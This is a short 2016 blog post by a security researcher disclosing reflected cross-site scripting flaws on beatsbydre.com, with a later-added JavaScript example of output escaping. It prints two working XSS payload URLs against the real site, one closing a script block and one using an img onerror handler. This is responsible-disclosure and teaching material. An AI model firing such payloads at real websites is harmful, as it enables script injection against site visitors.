Tuesday, 1 March 2016

XSS in Beatsbydre.com

In 2014 Apple acquired Beats. Just after the acquisition I thought of testing it, and I ended up finding multiple XSS in their main domain, http://beatsbydre.com.

So what was next, other than reporting the bug?

The vulnerable links were like the ones below:


http://www.beatsbydre.com/earphones/tour/red/900-00101-01.html?maxLimitError=--></SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(34, 120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>



http://www.beatsbydre.com/headphones/mixr/beats-mixr.html?bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm&icid="><img src=1 onerror=prompt(document.domain);>//
 
Simple vectors were used.
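Added example, not part of the original post: the second URL above indicates the icid value was echoed into the page without encoding. The sketch assumes it lands in a double-quoted attribute (the post does not show the markup) and compares raw interpolation with encoding on output; all function names and the /cart link are hypothetical.

```javascript
// Added example; escapeHtml, renderUnsafe, renderSafe and isValidIcid are hypothetical names.
// Assumption: the server echoes the "icid" query parameter into a double-quoted
// HTML attribute. The post does not show the real markup.

// Constructed sample: the query string of the second URL in the post.
const SAMPLE_QUERY =
  'bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm' +
  '&icid="><img src=1 onerror=prompt(document.domain);>//';

// Before: raw interpolation, so a double quote in the value closes the attribute.
function renderUnsafe(icid) {
  return '<a href="/cart?icid=' + icid + '">Buy</a>';
}

// HTML-encode the characters that can end an attribute value, open a tag,
// or close a comment or script block.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// After: percent-encode for the URL, then HTML-encode for the attribute.
function renderSafe(icid) {
  return '<a href="/cart?icid=' + escapeHtml(encodeURIComponent(icid)) + '">Buy</a>';
}

// Stricter option: accept only the shape an id of this kind should have (assumed here).
function isValidIcid(icid) {
  return /^[A-Za-z0-9_-]{1,64}$/.test(icid);
}

function demo() {
  const icid = new URLSearchParams(SAMPLE_QUERY).get('icid');
  return { icid, unsafe: renderUnsafe(icid), safe: renderSafe(icid), valid: isValidIcid(icid) };
}

console.log(demo());
```

The same escapeHtml call also neutralizes the `-->` and `</SCRIPT>` prefix of the first URL's value, since the angle brackets no longer reach the parser as markup.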
 
At first Apple refused to address the vulnerability.
 

 


But later on they accepted the report.
 
As per Apple's policy, only HOF was offered as a reward.
 
 


Muhammad Abdullah
